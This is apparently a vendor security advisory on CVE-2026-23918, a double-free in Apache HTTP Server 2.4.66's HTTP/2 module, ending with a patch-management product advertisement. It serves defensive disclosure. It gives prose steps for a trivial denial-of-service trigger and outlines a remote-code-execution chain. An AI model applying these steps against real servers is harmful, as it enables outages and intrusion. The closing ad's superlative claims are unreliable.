The Apache Software Foundation has issued a security update to fix a critical flaw in the HTTP/2 module of Apache HTTP Server, identified as CVE-2026-23918. This vulnerability could be abused to cause a denial-of-service condition and, in certain scenarios, may even allow remote code execution. Although there are no confirmed cases of active exploitation so far, researchers have demonstrated a working proof-of-concept for RCE, making it important to apply patches promptly.
Technical Details
| Attribute | Details |
|---|---|
| CVE ID | CVE-2026-23918 |
| CVSS Score | 8.8 |
| Vulnerability Type | Double-Free |
| Component | mod_http2 — specifically h2_mplx.c |
| Access | Remote, Unauthenticated |
| Impact | Denial of Service (DoS) and potential Remote Code Execution (RCE) |
| Affected Version | Apache HTTP Server 2.4.66 |
| Fixed Version | Apache HTTP Server 2.4.67 |
| Reported To Security Team | Before May 2026 |
| Patch Released | May 2026 |
Impact Summary
This vulnerability leads to two distinct attack outcomes:
| Outcome | Severity | Prerequisites | Notes |
|---|---|---|---|
| Denial of Service (DoS) | High | None , works on any default deployment with mod_http2 and a multi-threaded MPM | Trivial to execute; one TCP connection, two frames, no authentication |
| Remote Code Execution (RCE) | Critical | Apache Portable Runtime (APR) with the mmap allocator | Default on Debian-derived systems and the official httpd Docker image |
Root Cause and Exploitation
Root Cause
The root cause lies in a race-like logical flaw within the HTTP/2 stream teardown path in h2_mplx.c. When a client sends a HEADERS frame followed immediately by an RST_STREAM frame (with a non-zero error code) before the multiplexer has fully registered the stream, the nghttp2 library fires two separate callbacks — one for the RST receipt and one for the stream close. Both of these callbacks independently invoke the same internal cleanup function (m_stream_cleanup), which queues the same h2_stream pointer into the purge list without a guard to detect duplication.
During the subsequent purge pass (c1_purge_streams), h2_stream_destroy and its underlying apr_pool_destroy are called for each entry. The second invocation of apr_pool_destroy on the already-freed pool constitutes the double-free. Because Apache uses a pool-based memory allocator (APR memory pools), this corrupts the heap state.
Exploitation: Denial of Service
The DoS exploitation path is trivial and requires no special tooling or authentication:
- Open a single TCP connection to the Apache HTTP Server.
- Send an HTTP/2
HEADERSframe on any stream ID. - Immediately send an
RST_STREAMframe on the same stream ID with a non-zero error code, before the multiplexer registers the stream. - The double-free is triggered, causing the Apache worker process to crash.
- Apache respawns the worker, but all in-flight requests on the crashed worker are dropped.
- An attacker can sustain this pattern indefinitely, continuously crashing workers and disrupting services.
No specific URL, headers, authentication credentials, or special content are required to trigger the crash.
Exploitation: Remote Code Execution
The researchers have confirmed a working proof-of-concept for RCE on x86_64 systems. The RCE exploitation chain is more complex and relies on the following:
| Step | Description |
|---|---|
| 1. Trigger double-free | Use the same HEADERS + RST_STREAM sequence to free the h2_stream pool. |
| 2. mmap reuse | On APR mmap allocator systems, the freed virtual address is reclaimed by a subsequent mmap call, allowing the attacker to place a fake h2_stream struct at the freed address. |
| 3. Fake struct construction | The fake struct’s pool cleanup function pointer is overwritten to point to system(). |
| 4. Stable container via scoreboard memory | Apache’s scoreboard memory (used for worker process tracking) sits at a fixed virtual address for the lifetime of the server process, even with ASLR enabled. This is used as a stable container for the fake structures and the attacker-controlled command string. |
| 5. RCE | When Apache’s pool cleanup routines execute on the manipulated struct, system() is invoked with the attacker’s command string, achieving arbitrary code execution. |
Affected Versions
| Product | Affected Version |
|---|---|
| Apache HTTP Server | 2.4.66 only |
Solution and Mitigations
Apply Security Updates
The Apache Software Foundation has released a patched version. Upgrading is the primary and strongly recommended mitigation.
| Action | Target Version |
|---|---|
| Upgrade to | Apache HTTP Server 2.4.67 or later |
Instantly Fix Risks with Saner Patch Management
Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.
It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.
Experience the fastest and most accurate patching software here.